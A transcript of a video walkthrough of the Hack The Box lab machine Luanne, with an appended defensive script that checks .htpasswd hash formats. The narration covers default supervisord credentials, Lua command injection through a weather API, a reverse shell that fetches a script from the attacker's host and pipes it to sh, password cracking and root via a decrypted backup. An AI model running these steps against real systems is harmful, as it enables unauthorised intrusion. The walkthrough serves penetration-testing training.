HackTheBox - Luanne

Captions
What's going on, YouTube? This is IppSec. We're doing Luanne from Hack The Box, which was released as an easy machine but in hindsight probably can be bumped up to a medium. Technically there isn't anything difficult about this machine; however, there are a lot of obscure things that you just have to understand, so if your recon game's not on point you're gonna run into a lot of frustration. For starters, the application on port 9001 is supervisord, which uses a, um, not common set of default credentials: the username is user and the password is 123. Most people may just guess admin:admin, admin:password and things like that, so if they don't go to Google to find out default credentials for the application, there's probably gonna be a lot of frustration. The second thing is this whole web app is just a weather API, and if you don't understand how to fuzz APIs, or you don't log into supervisord to see the actual endpoint, um, you can probably run into a lot of frustration trying to figure out just how it works. So based upon those two things it probably can be bumped up to a medium, but let's just jump in and do the machine.

As always, I'm going to start off with the nmap, but I'm going to change it up a little bit because we don't know what ports are open and I want to start looking at this immediately. So I'm going to do a --min-rate flag in nmap, which is going to set the minimum rate of 10,000 packets per second to the scan, which is going to make it go insanely fast. So we'll do 10.10.10.218, and in like half a second we get three ports already. This just scanned like the top 1000 ports, and it's 22, 80 and 9001. So what I'm going to do with this is put it in a regular nmap: so sudo nmap, -sC for default scripts, -sV enumerate versions, -oA output all formats, put in the nmap directory, but first that directory has to exist; we can call it luanne-targeted, and then the IP address of 10.10.10.218.
And the reason why I don't use this min-rate too often is because when you do things this fast, things can just miss, and when you miss an open port this early in the recon it can really just frustrate you later. So I always hate going super fast, but every now and then I just want a little instant gratification and see the reports. So with that being said, let's now do a sleep 300 to sleep for five minutes, and then we can just throw in a normal nmap of -p- 10.10.10.218, -oA output all formats, luanne-allports, and this nmap probably should be ran with sudo. So again, along the fact I don't like running nmap too quickly, I also don't like running nmap multiple times, so that's why I did this sleep 300. So hopefully in five minutes this one finishes and this one will kick off automatically and we'll be just on our merry way.

But very first thing, uh, let's just take some quick notes. Let's copy these ports so we know we have them. I'm gonna go in this Luanne, create a new note, I'm gonna call it, we'll start with 05, and we'll call this enumeration, and it's just gonna be nmap, and we will put these results. And if you're wondering from my previous video, this is Obsidian, and the only change I made to it was I went in settings and changed this readable line length to get back these margins, so if you want those margins yourself you just click that. We have three ports; the easiest one to do some recon on is 80.
So let's go over to 80, 10.10.10.218, and we get prompted for username/password. Let's try admin:admin, admin with no password, admin:password. Uh, if we escape out of that, we just get this 401 Unauthorized error message, but it is pointing us to localhost port 3000. So what I'm going to do is check port 3000, and we get unable to connect, so the port is not listening. Um, it does tell us, though, that this web application probably isn't just HTML; it's doing something to direct us to a different port, so this is either nginx, Apache or something. We can probably figure out what it is by looking at nmap, and if nmap's not done we can curl -v to show us the headers. Uh, the server: nginx. So nginx is acting as a proxy and forwarding everything on port 80 to 3000. We can check other pages, so we can check like /dev to see if that exists, .htaccess, and the interesting thing is when we go to any other page other than index, or is it index.html, uh, we get... index.html goes to nginx; if we don't give it a directory, that's when we get asked for the password. So this is weird. Um, I'm going to add a new note and we're going to call this 10-nginx-80, and what I'm going to do is just do, uh, "web server on 80, odd behavior"; we're going to say "/ asks for auth, no other endpoint does". And then let's try other things. So we tried .htaccess; the other common one is robots.txt, and we see a message saying /weather, it's returning 404 but still harvesting cities. Doesn't really make sense to me right now, but let's add it here. I'm just going to curl it so it's a bit prettier. So if we just curl robots.txt we can copy this in and then go over to Obsidian and put that there. Uh, there we go. If we look at this we can see how it looks here. Um, I'm going to change this to be bash just so we have some type of syntax highlighting and it looks better. Okay, so let's check out our nmap because that's probably finished. Looks like it is, and we have, um, more information we can put in our notes, so let's go back to
the enumeration, and we can say bash here for syntax highlighting and paste this. Uh, one day I want to put like an nmap syntax highlighter in this, but we can see pretty print there. If we look at this, it is an OpenBSD box, so NetBSD, maybe not Open, maybe it's FreeBSD or NetBSD, I don't know BSD that well. Um, OS: NetBSD. Uh, let's see, web server is httpd, we got a robots.txt. 9001 is Medusa httpd; is this a hint to like use medusa against port 80 to break into it? I don't know exactly what that is, but 9001 is also listening on a web server, so let's go check out port 9001, uh, my favorite port. But if we go here we also get stuff. Let's do admin:admin, admin:password, we escape out of this, we get message unauthorized, so this one is different than, uh, port 80. So if we look at port 80, 10.10.10.218, escape, this is the unauthorized cell; these are two different applications. If we look at this, it is the Supervisor process manager. So I wonder if we google this; let's do "bsd supervisor process manager" and we can say "default password", see Ansible. Wonder if we google "medusa 1.12", maybe this is an actual application. Let's see, supervisor 3.0a, this looks like it, Medusa 1.12 right here, so it looks like we have some type of CVE, I can't read that. Let's see, default password, see supervisor readme, password is not sent, still trying to figure out this. Let's check this Read the Docs page; this looks like the user manual to it. We search for password, uh, looks like the default maybe user:123. If we refresh this, user:123 does not work. Oh, I'm on the httpd server; we can try it here, user:123, and we log in. So we have this Supervisor 4.2.0. So what I'm going to do is look at Metasploit, so I'm going to do sudo msfdb run, and while that does go, um, we did have something in robots.txt that pointed us to, I think, /weather, so I'm going to look at it to see if there's anything here, and we get 404 Not Found. So going back here, Metasploit is starting and nmap is still running; we probably should have done a -v
here so we could see here, report says it found it. Uh, let's search for supervisor and it looks like we got something here, XML-RPC. Let's use 1, and I'm thinking I may not want to use this; now I'm looking at the disclosure date, it's 2017, and we have 2021 here, however the year currently is 2021, so maybe this is just a dynamic value. Um, can I look at versions? It doesn't look like it. Uh, let's do user:123 here, is there a version number, uh, like 4.2, 4.2.0. Uh, show options, does this say what version is vulnerable? 3.0 to 3.3. If we do show targets there's no more targets, so this one probably will not work because we're running a different version, but I guess there's no harm in trying, right? So let's set LHOST to be tun0, which is my IP address, set RHOST to be 10.10.10.218, and let's see, let's set, so anything else we need? I imagine a username and password. Oh, HTTP password, HTTP username; I was looking for like just username/password. So set HTTP password to be 123, set HTTP, or HTTP username to be user, show options. Uh, let's search for bsd x64 and I will use reverse_tcp. The reason why I'm switching to this is because the other payload was Linux and we want to use a BSD payload because that's what SSH told us. Okay, let's run this and it's not a compatible payload. Um, show payloads, does it tell me Linux, Linux, Linux, um, generic shell reverse_tcp; we can try this one, set payload, this, run and see if anything happens, but we don't get a session. Um, it's not surprising; I'm not going to dig too much into it because again the version says 3.0 and this version says 4.something. So let's just take a look at what it shows us. We look at memory, processes and uptime. Memory doesn't look too interesting. Processes, we can see something interesting here; if we refresh, doesn't look like it changes, but we do see httpd going to port 3000 and it's using this -L flag with weather and then pointing it to, uh, weather.lua. Lua is a scripting language, so hold on one second, I'll just create a note and explain
it. So this will be supervisord, but Lua is a scripting language and we may be able to exploit it knowing that piece. So it's pointing here, we get this -L and it's going to port 3000, and here let's do 00-creds, put it in here, let's keep putting them in the folder; I have a bad habit of not putting it in that folder when I create it. Credentials, um, I should do it in a table but I hate doing tables. supervisord, user, 123, we can say service, user, password. Did I do this correctly? I did not. Um, maybe we need this, there we go, that looks like it formatted into a table, awesome. We can clean this up and now we have that, maybe say 9001. Okay, so let's go back to this. Um, we know port 3000, this is the command that starts it, and it's specifying -L weather and it's specifying a script that ends in .lua. So what Lua is, let's see what the acronym is so I don't say it, um, maybe, I don't know, it's a lightweight programming language; it's also what nmap uses. Um, so let's go and fuzz this endpoint. If we go back here and curl /weather we just get that error message, but the robots.txt is telling us it's still harvesting cities, so let's just run this with ffuf to fuzz this endpoint. So we can do ffuf, -u for URL, uh, -w for wordlist, SecLists, we can do, what is it, discovery/web-content/raft-small-words.txt, and I probably could have used gobuster for this as well; there's no real reason I'm using ffuf other than, like, in my mind I see, um, I'm like fuzzing an API endpoint so I wanted to use ffuf. We get nothing. So what I'm going to do is curl 10.10.10.218/weather/test; we get 404 Not Found. Uh, test two, we should get something here if we're doing it correctly. Let's do http:// and see if this does anything, and this doesn't. I'm going to switch over to gobuster to try it, so I'm not sure what I did wrong in that very first request; I can probably look up, but we see forecast returned. Um, let's see, ffuf, maybe we could actually specify http:// in the URL, maybe that was it, because it sent
the request, it sent 43,000 and we're still on setting now but nothing happened. So we got this forecast, so let's go over here and copy, and then we can go over to our notes for nginx and say /weather, paste that, and then we also probably want to specify bash for syntax highlighting so when you look at this it looks pretty. So say /weather, fuzzing files, API. So now we want to look at this /forecast, exactly what it returned. So I'm going to go back over here and do 10.10.10.218/weather/forecast to see what we have. Um, no city specified, use city=list. So let's do ?city=list and we get a list of cities. If we do city=london we get something. So we want to fuzz this yet again, so I'm going to Ctrl-C that, go back to ffuf, and we're going to paste the new URL, and what I'm going to do is change up the wordlist, and we're going to change this to SecLists fuzzing and then just special-chars. This is a really quick way to fuzz just random APIs you don't understand; it sends 32 characters. If you look at this wordlist it's just a list of all the special characters you can do. These special characters generally can make applications fail in magnificent ways, so that's why we want to run this, and we get nothing right off the bat. So let's just curl this city command and see what we get with an error message. So do asd, it returns 500s, so we probably want to tell ffuf to match with -mc 500 to tell it to match the code 500. I thought that's what we'd want to do, but we still error out, matcher HTTP response 500. Uh, let's specify http:, I did that mistake yet again. So if we don't match 500, the only thing that gives us a 200 is a percent, and if we put a percent in here, what happens? Percent, unknown city. Wait, what? I'm not sure why. Okay, um, it just gives a 200 error code with percent, but if we match code 200 and 500 we get more output, and this is where we want to look at everything that's returning. Percent is 12 characters, uh, there are 12 words; we
probably want to hide everything with either five words or one line. I'm going to specify five words first, so -hw for hide words, no, it's -fw, filter words; -hw is, um, wfuzz syntax, but -fw for filter words, we'll say 5. So we're no longer showing anything with five words and we just have three. We have plus, which is probably getting translated into a space and does nothing, uh, single tick, which gives us nine words, and this percent which we already saw. So if we put a single quote here we get a weird error, a JSON parse error. If we look at the source to this we have "lua error: attempted to call a nil value". Now, whenever you trigger an error message like that you generally should look up how to do a comment in that language, and a comment in Lua starts with --. So if we do single tick -- what happens? Uh, let's send this over in Burp Suite; every now and then I don't know exactly what is actually being sent to the server because this does like URL encoding and other magic, so Burp Suite does not, so that's why I always like switching over to Burp Suite eventually. And I think this text is off, I really gotta learn ZAP and switch over to ZAP because I am not liking this, but, uh, let's see, user options, display, HTTP message, let's go to 18, sure, and font size, let's go to 15.
Okay, that's a bit better. So we sent a single tick and -- and we still have this nil value thing. If we put something here, so let's do list, "attempted to call nil value", let's space -- space, I'm not exactly sure what's going on here; we can't seem to fix this query, but we have done some type of, um, thing. If we put test here, anything? No. So what I'm going to try to do is inject Lua, and Lua has os.execute, I believe; if it doesn't then I will just, um, google up how to do command injection with Lua. I'm pretty sure it's that. If we do os.execute id we don't get what I expect. Uh, let's try, if we sleep, sleep is a really cool one, so if we sleep for five seconds, um, we'd be able to tell. So we're not getting command execution right yet. Uh, maybe we'd put a colon? Nope. So let's see what can we do; let's google up Lua command injection because it's been a while since I've had to do this. "lua command injection", go to the first one, let's see, some text, "my code and a string inject", so it looks like it is... well, this looks like PHP. Um, "lua execute shell command", so let's not look for injection, let's just see how to do something. So "lua os.execute return value", so this is the command, so os.execute is correct here. So what if we just put os.execute? Unknown city, nil value. So what I want to do now is take a step back and just try to make this application work with this single quote, uh, comment. So what I'm going to do is go back to ffuf and we're going to do another fuzz, but we're just going to put single quote, comment, to see if anything happens. Uh, we may not want to filter word 5 anymore; let's just run this. Uh, I guess we have to escape the single quote. Well, this works still. Let's see, let's do -fw 9, and we get a parenthesis is going to make it do something different. So let's go back to Burp Suite and do parenthesis there, and we get unknown city. So if I do london, now we have now completed the syntax. So I'm guessing, if I thought more about this, the variable name would be like, uh,
we're defined like this, and what we're doing is just ending that piece by putting this in, so now we can begin the next command. So let's try os.execute('id') and we get a response here. So now this is good. Um, the one thing that I don't know about BSD is if we can do a normal reverse shell. So if we do bash, echo /dev/tcp/10.10.14.1, let's, uh, 14.4, send it to 9002. We do nc -lvnp 9002, I'm gonna do it in a different pane real quick because we have to take notes of what we did there. We don't get anything, but if I do curl 10.10.14.2:9001, uh, 9002, maybe have to put a space here and URL encode, grave, curl, oh shoot, uh, 10.10.14.4, not .2, there we go. So let's try this bash again real quick. So if we Ctrl-Z all the way here, bash, hit go, I was doing 9002. Let's URL encode this; we don't have anything, okay, that's fine. Uh, let's take a step back real quick and just do ffuf. So if we copy this, go back to Obsidian, nginx, bash, and at the end of the video I will go over all the things I took notes on. So bash, okay, and we can go to, where is it, this one, grab this, copy, paste. Oh, that did not copy well; there, let's just fix that real quick. Every now and then I don't know what's going on but my tmux puts a lot of trailing spaces; I think it's why I'm in edit mode, and, uh, go up, so I gotta figure out what's the fix to that. There we go, just let myself know I trimmed it, there we go. Okay, so now we have notes of that and we got to get a shell. So what I'm going to do is make the www; I'm going to go in www and we're going to listen on two ports. The very first one is just going to be a web service, so python3 http.server, and then this next one's going to be the reverse shell, and we could probably do it without this web server; however, it's just easier with the web server because we don't have to worry about bad characters, URL encoding and things like that; we just send a request. So we're going to curl 10.10.14.4 port 8000 /shell.sh and we should just see a 404
error. That's good, we're just confirming that we can get there. So now I'm going to go to Google, reverse shell cheat sheet, I misspelled that horribly, there we go, I love when it can just figure out what I wanted to say. I'm going to look for a shell, netcat OpenBSD sounds good. So let's grab this and I'm going to create rev.sh and let's change the IP and port, so this is going to be 10.10.14.4 and port 9001. Okay, so now when I hit go on this Burp Suite window it should hit that shell; uh, we called it shell.sh, it's rev, uh, move rev.sh into www. Okay, so now we can just pipe this over to bash, and we got it, we just didn't get a shell. Uh, let's try sh, no response, and there we go, we got a shell. Um, I'm guessing bash just doesn't exist on this box. If we do find / 2>/dev/null | grep for bash, uh, yeah, there is no bash binary here. So if you look at where we are, we're in www and, oh, there is a .htpasswd file in this. If we cat this, is this gonna be just the user? No, I was thinking this could be user:123, the supervisord one, but no, we have this webapi_user and it looks like it is md5crypt. So let's go into the Kraken, and, oh, it's actually offline right now, shoot. Um, I forgot to power that on before I did this video. Uh, let's do pw, let's see if hashcat will crack in a VM; uh, never really tried this, if it doesn't I will go power on my box so we can use it to crack. So let's see, um, hashcat --example-hashes, uh, less, md5crypt, it is mode 500, so -m 500, uh, pw is what I called it, and we want to do /usr/share/wordlists/rockyou.txt, and will it start? Token length exception. vi pw, uh, let's do --user, so it was user:password, so I just added --user to tell hashcat that the username is before the password. And is it actually, yeah, it looks like it'll just use my CPU, so we'll see how long this takes, and if it takes too long I'll just give up and go power on my other box. Well, this wasn't intended, but I guess we're going to see how well Obsidian can recover, because if you looked up there, um, my VM froze
as soon as I ran hashcat. So this is why I say never run hashcat in a VM, because who knows what will happen. Um, also my Kraken doesn't appear to be powering back online after I moved it, and I probably just have to bring a monitor down and hook it up and hit a key or something. So what we're going to do is try to do john, and if john doesn't work in this VM then I will run hashcat on my host and show you that, but yeah, we're just having a little bit of issues getting into the cracking piece. Um, hopefully Obsidian saves as I go, every time like I leave the note; hopefully it's saving in the background so we don't have to retype our notes, because, valuable lesson, always save; saving is important. So we'll resume the video once this VM is booted back up.

Okay, here's the moment of truth. Let's see if Obsidian actually recovers my notes, and, oh, it does. Um, I think we got everything. Um, this page may be missing something, or maybe I just didn't take a good note here. This is running processes, and we can say default creds user:123, and we probably should have put the domain where we got this, um, on Read the Docs; I remember the domain was readthedoc-something, but whenever you say there's a default cred somewhere, always provide the link showing yes, this is default, or on the internet, because applications have multiple default creds, so it's always good to point it out, because sometimes you may think admin:password was default when they actually set that, which is silly, but I digress. Let's go on, and I'm going to try to use john on this, so --wordlist=/usr/share/wordlist/rockyou.txt, and do it, crack; uh, no such file dictionary, ls /usr/share/wordlist, wordlists has an s on the end, there we go. And wow, it cracks super fast; it is iamthebest, as webapi_user. So let's try SSHing in with this, so ssh webapi_user, and we can say iamthebest at 10.10.10, wait, I don't know what I'm thinking there, webapi_user@10.10.10.218 and the password of iamthebest. Uh, permission denied (publickey),
so we can't SSH in. Uh, we should do a reverse shell, and if we took better notes this would be super quick, but apparently we don't have a note of this. So let's do python3 -m http.server, nc -lvnp 80, uh, 9001. Thankfully we do have this rev.sh, which does make it easier. So we can curl 10.10.10.218/weather/forecast, and it was city is equal to, um, I'm going to escape the single quote, and then we'll do a parenthesis, os.execute, uh, curl 10.10, I wonder if I should do a space, probably, 10.10.14.4 port 8000 rev.sh, pipe it to sh, and, and comment, see, put this in quotes. Attempted to call a nil value, so we didn't even get the, um, anything working. There we go, I didn't need to escape that. So we got a reverse shell, and what I'm going to do is notate this. So let's copy, go to Obsidian, and we'll say 20-rev-shell, and we can just paste and say the contents of rev.sh is this, and what I'm also going to do is put these on each line so it's easier to read. There we go. So now we have this, where is www, and inside of /var/www there was a credential, so we can copy this and then paste that as well. Okay, and we should go over here into our creds table and say, question mark, it was webapi_user, iamthebest, I think it was that, htpasswd, yep, webapi_user. So now we have to figure out what this user is. If you remember going back all the way to the beginning, uh, when we first accessed, um, 127, or the web server, it asked for a credential, so let's try that. Uh, Firefox saved a bunch of pages, that's helpful, but we can try 10.10.10.218, webapi_user, iamthebest, and we get a different thing. So we can have weather forecast city list, so it looks like maybe it's the same thing. Let's put a single quote, uh, single quote, well no, that directed us right where we were, so there's nothing different here; we're going .218/weather/forecast, so I'm not exactly sure what this is. If we go on this box, do a netstat, I probably should have done like, um, -n to not do DNS lookup, so let's Ctrl-C out of that, do this
rev shell again, thankfully super quick because we have, um, the one-liner. So let's do which python, uh, echo $PATH, so we have a path, python, python3, python3, okay, python3.7 exists, so I was doing that, so we can do python3.7 -c import pty; pty.spawn, then bash, oh, we don't have bash, then sh. Is this going to work? stty raw -echo, fg, enter, enter. Does not look like it works; at least I have Ctrl-C now, so I don't have tab auto-complete, but if I Ctrl-C it doesn't kill my shell. Um, I'll live with that. So ls -la, we got .htpasswd. Let's do netstat -an, uh, let's see, netstat -anlp, netstat -peanut, wait, netstat -peanut, no no no no, okay, uh, BSD has different arguments than, uh, Linux, so that's what I'm struggling with now. Let's export TERM=xterm; can I clear a screen? No. Oh, let's see, netstat -a -n, let's just go look at this. We can do netstat -an | grep for LISTEN, and we do have another port; we have 3001, so we have 3000, 3001. If I do ps -ef, uh, maybe -auxw, there we go, let's see, ps -auxw | grep 3001.
We can see how this one is started. So we have a -u flag, uh, we have -u here, -X, -s, -i, let's see, this one is running as r.michaels. So what I'm going to try to do is su r.michaels, I did "rm s", yeah, r.michaels, iamthebest, can authenticate, okay. So let's see, we have to get the rest of this output and it's truncating something because this weather went longer. So what I'm gonna do is go back to this 9001 thing to see if this can help me. So if we go 9001, user:123, we do processes, is 3001 even here? It is not, refresh, I don't know, user:123, I'm not sure exactly how this process thing is running, but we're not getting all the processes. If I tail standard out, do we get more? Okay, we have the rest of 3001. I'm sure there's probably a way we could have done like some terminal magic to get more stuff out of here, but wasn't sure, and I see it here. Uh, I wonder if dash is here, no. So we got this and we can look at all the arguments, uh, we have /home/r.michaels/webapi/weather.lua. So if we cat this, permission denied. -p, this is going to be the PID of this web server, -u probably the user to run it as, r.michaels, and -b the directory, and we can't get into this directory, right? curl /, I don't know, I did curl /, yeah, permission denied. Uh, we can do a curl and go back to our one-liner, so if we go back to this rev shell, go to curl, and we're going to change this os.execute to be something else. Let's see, let's just copy this piece, curl 127.0.0.1:3001, okay, weather/forecast, id, like that, uh, wrap in quotes, curl, double quote, okay. Um, it doesn't look like we have this command injection anymore, so let's see. We can do, let's go back here, man httpd, um, let's see, NetBSD httpd, uh, NetBSD httpd, let's see, I want to look at all these arguments, so what arguments are different between these two web servers? Where is it, come on, okay. So let's copy this command, go to supervisord, and we can paste that, and then I also want to look at this to see how these arguments are different. So we got -u,
-s, -X, -i 127, so the differences are going to be, uh, let's see, -i port is different, the -L is the same, uh, location of Lua, and then let's see, we have a -p, so we specified pid, we don't have a pid here, so -p pid, -u user and -b home directory. So these are three things I want to look at. The port difference, not really of interest, but I want to see how this user and home directory parameter works, because we may be able to have something here, and then if this doesn't work we're going to go back to fuzzing the, um, this thing. The reason why I didn't is because I'm lazy; we don't have SSH here, so I'd have to copy a program that does like a proxy so I can access port 3001 on localhost, so I don't feel like copying any programs over just yet. Um, trying to think what the program name is, I'm drawing a complete blank, it is, uh, chisel, um, chisel is what I was looking for. So let us, um, go and find this. So we want to look at the NetBSD thing, and I don't know if this was it because this doesn't have all the flags we want. Um, oh yeah, it does, here we go. That's -U, so username, uh, causes httpd to switch to the user and the groups of username after initialization; it's like -t, so nothing interesting there. Let's go to -b, is -b home directory? Uh, let's see, -b enables daemon mode, so -b is probably background, switch to user. We're going to look at -p next; let's see, -p, public directory, so that's not daemon, that is public directory, directory, so that was going... wait, if I look at lowercase, yeah, this is pid, uh, lowercase p would be that. Uh, let's see, the port, nothing interesting there. Let's look at these other arguments, -u, -X and -s, so -u, -X, -s, always important to know what is running. Let's see, -u enables transformation of uniform resource locators, oh, that's where we actually can access users' home directory, um, and birthdays had it right, let's see, this is 3000, -i, oh, yup, so enables user dir. -X, directory indexing, so dir indexing, this is like that, um, if you
go to a page that doesn't have index.html it just lists all the directories. The last one we want is -s, logging, so this is logging to stderr. So right now this user directory is interesting to me. We have a shell on the server now, so we can cat /etc/passwd and look for the users on the box, which is probably just root. Weird, there's a toor user, dash toor, okay, I came in, seo, okay. Um, I'm not sure if that's a default user or that's just what I'm used to seeing, like a backdoor user. Um, I'm guessing it's a default user because it's "born again", like if a backdoor is created they probably wouldn't create that description. Uh, let's do r.michaels, so curl 10.10.10.218/~r.michaels, I copied a bunch of ANSI characters, r.michaels not found. Let's do root, not found. Let's try 3001, curl localhost:3001/~r.michaels, unauthorized, so that's different. Let's do the webapi user, so is it curl --user webapi_user, the password of iamthebest, I think that's how you do users in curl, and we get a page. So we have a directory listing, Index of /~r.michaels, and the reason why this one probably worked is, um, it's running as r.michaels so it has the permission to, is my guess, because we're running as nginx, and nginx, or the, oh, we can get root, but the other nginx server probably just doesn't have permission to any of those directories. Uh, root doesn't exist, okay. So we can get this id_rsa. So let's copy this, I'll just copy the whole thing and we'll go to rev shell; we may want to create another one actually and say 25-3001. I kind of regret saying I'm going to start taking notes as I go, because taking notes live on videos just, I don't know why, but it's painful. Let's go over here and call this, let's do id_rsa, and we get an SSH key. So let's try using this SSH key; I'm copying it, and this will finally let us get away from this reverse shell, which will give us the up arrow. So let's vi r.michaels, paste the key, chmod 600, ssh -i the key r.michaels@10.10.10.218.
Gonna let me in? It is. So welcome to NetBSD. Uh, we can get the user.txt, and if we look at this there is a .gnupg directory; if we go in there, it's just some keyrings. So let's try, um, doas, which is BSD's sudo. If we do doas whoami, it requires a password; we don't have a password. We can try iamthebest again, and authentication failed. But there is this backups and devel directory, so let's go into backups. I just don't have tab complete, that's annoying, uh, cd .., cd, I do have back-tab auto-query, I was just in a directory. We have this tar file that is encrypted, and if we look at devel, let's go webapi, do we have any other credentials? less weather.lua, I don't see any passwords. Go www, index, .htpasswd, and this is the webapi_user that we got before, so nothing interesting here. That's all that is in that directory; I guess both web servers run here, the 3001's webapi and 3000 www or something. So we have to figure out how to deal with this tar file, and I'm guessing it's just encrypted based upon it's saying .enc on the end. If we do a file against it we just get data, we don't get tar. If I do history, uh, it's just showing my history. So let's see, "netbsd encryption", see cryptographic device, "netbsd encrypt file", we got netpgp. So we can try netpgp decrypt, and this may work because we just have the GnuPG keys in our home directory. So let's do netpgp --decrypt the file name, /tmp, let's see, /tmp/test, can't open, where was it, was it, do we do it the other way, do we do --decrypt, that just goes to stdout, let's see, --decrypt --output=, so let's do --output /tmp/backup.tar.gz, cd /tmp, tar -zxvf, and we got exactly what we had before, devel, www. Is this file different? The passwd, diff .passwd, or .htpasswd, and home, what was it, r.michaels devel web, it's devel www and then .htpasswd. So these are different files. So let's just try decrypting this one, or cracking it, so grab this, vi pw, paste this, john, I don't have that, so john pw
word list is equal to user share word list rocky.txt and we get the password of little bear so if we do do as who am i little bear we get root so do as sh little bear and we are now root so hope you guys enjoy this box take care and i will not see you next week yet because we have to fix these notes so let's see web api user we have r.r michaels so this is ssh uh let's see local we'll call this bsd os os is the type of credit is little bear and this is web and password i'm going to do description i'm going to say default grid this one was in hd pass wd and this is an encrypted backup hd passwd okay we look at this maybe it doesn't like the periods oh dash dash that there we go so now we look at this page good enumeration uh we should probably go or we do have a map of everything so this 9001 also web port so we can say 9001 running medusa supervisor server default creds of user123 okay nginx so the very first thing on the nginx server we noticed odd behavior um slash asked for authentication when no other endpoint did and this is showing it so robots.txt says weather exists okay and then slash weather we fuzz this api um the reason why we fuzz this api was based upon supervisor d and the robots.txt so um looked for api endpoints underneath slash weather based upon robots text and supervisor d okay and let's see we can always snip this header out real quick and this is found forecast this one is injection so we found injection within weather forecast and here we have what is this one um identifying ballot injection payload so the reason for this one is we fuzzed with a single quote and a comment to find out how to close off this because we're trying to um get the single quote to not kill the application so get do not error the app there we go okay supervisor d we got default creds we only just said read the docs we can probably now go here read the docs not that one pdf latest okay so we can say read the docs give them a link and then we also would probably want to 
do password and go here and print screen copy this uh before we do that we should probably highlight where the password is so like that there we go and paste the password okay running processes see two interesting processes had to tail stdl and supervisor d to see this and this one is httpd argument descriptions okay the rev shell and then this kind of where notes fall apart so let's see getting a shell this is contents of revdos h location of dot ht passwd and let's see this one is um getting our michael's sh key the password is from let's see hd passwd readable by nginx and then with our michaels the last thing we did was have to decrypt so if we do lsla on home we can say oh we're still root lsla on gnu pgp lsla home gnu pg we have key rings so let's see create a new thing uh 30 are michaels and we did um gnu pgp key okay and then with that key we could decrypt backups so ls um so if we go backups [Music] i'll just do was it was the command we did diff there we go [Music] so we can copy this so this very first one is user has pgp keys these pgp keys decrypt a backup user's password is in hd passwd so really bad notes for this one but at least we have notes i guess uh only took one picture that feels low but hopefully as i do notes more throughout these videos um we take better notes eventually and you'll get to see me improving my process of note-taking because this one we didn't really do a great job but we still took them uh i'm going to try counting this to all.md and let's see if we export this as pdf what does it look like so export to pdf sure sure places oh it opened it for me so we can see notes for everything we took um not the best notes definitely not good enough for a blog post but it's better than not having anything so hope you guys enjoyed that take care and i will see you all next week
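Editor's added example, not code from the video or from IppSec: the walkthrough turns on an .htpasswd entry whose hash fell to a wordlist run, so the defender's check is whether every entry in an .htpasswd file uses a slow, salted hash in the first place. The script below classifies each entry by its hash prefix and counts the weak ones; the usernames and hash strings in the sample file are constructed placeholders, and the names htpasswd_hash_kind, report_htpasswd and count_weak_htpasswd are this example's own.

```shell
#!/bin/sh
# Added example (not from the video): audit an .htpasswd file for weak hash formats.
# All sample data below is constructed for illustration; hashes are not real digests.

# Classify one .htpasswd hash field by its prefix (formats Apache's htpasswd can emit).
htpasswd_hash_kind() {
  case "$1" in
    '$2y$'*|'$2a$'*|'$2b$'*) echo "bcrypt" ;;      # slow, salted: fine
    '$6$'*|'$5$'*)           echo "sha-crypt" ;;   # salted and iterated: acceptable
    '$apr1$'*)               echo "apr1-md5" ;;    # fast MD5 variant: weak
    '{SHA}'*)                echo "sha1" ;;        # unsalted SHA-1: weak
    *) if [ "${#1}" -eq 13 ]; then echo "des-crypt"; else echo "unknown"; fi ;;
  esac
}

# Print one tab-separated line per entry: user, hash kind, ok/WEAK.
report_htpasswd() {
  while IFS=: read -r user hash; do
    [ -z "$user" ] && continue
    kind=$(htpasswd_hash_kind "$hash")
    case "$kind" in
      bcrypt|sha-crypt) status=ok ;;
      *)                status=WEAK ;;
    esac
    printf '%s\t%s\t%s\n' "$user" "$kind" "$status"
  done < "$1"
}

# Echo how many entries are neither bcrypt nor sha-crypt.
count_weak_htpasswd() {
  report_htpasswd "$1" | grep -c 'WEAK$' || true
}

# Constructed sample .htpasswd: one strong entry, three weak ones.
SAMPLE="${TMPDIR:-/tmp}/htpasswd_sample.$$"
cat > "$SAMPLE" <<'EOF'
alice:$2y$10$CONSTRUCTEDbcryptSALTandHASHxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
bob:$apr1$c0nstrct$CONSTRUCTEDapr1hashxxxxxxx
carol:{SHA}CONSTRUCTEDsha1base64xxxxxxx=
dave:CONSTRUCTDES1
EOF

report_htpasswd "$SAMPLE"
echo "weak entries: $(count_weak_htpasswd "$SAMPLE")"
```

Run it against a real .htpasswd by replacing the SAMPLE path; any entry reported WEAK should be regenerated with bcrypt (htpasswd -B) before an encrypted backup of that file becomes the weakest link, as it did on this box.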
Info
Channel: IppSec
Views: 22,244
Id: -KxvC3NY0Wo
Length: 67min 17sec (4037 seconds)
Published: Sat Mar 27 2021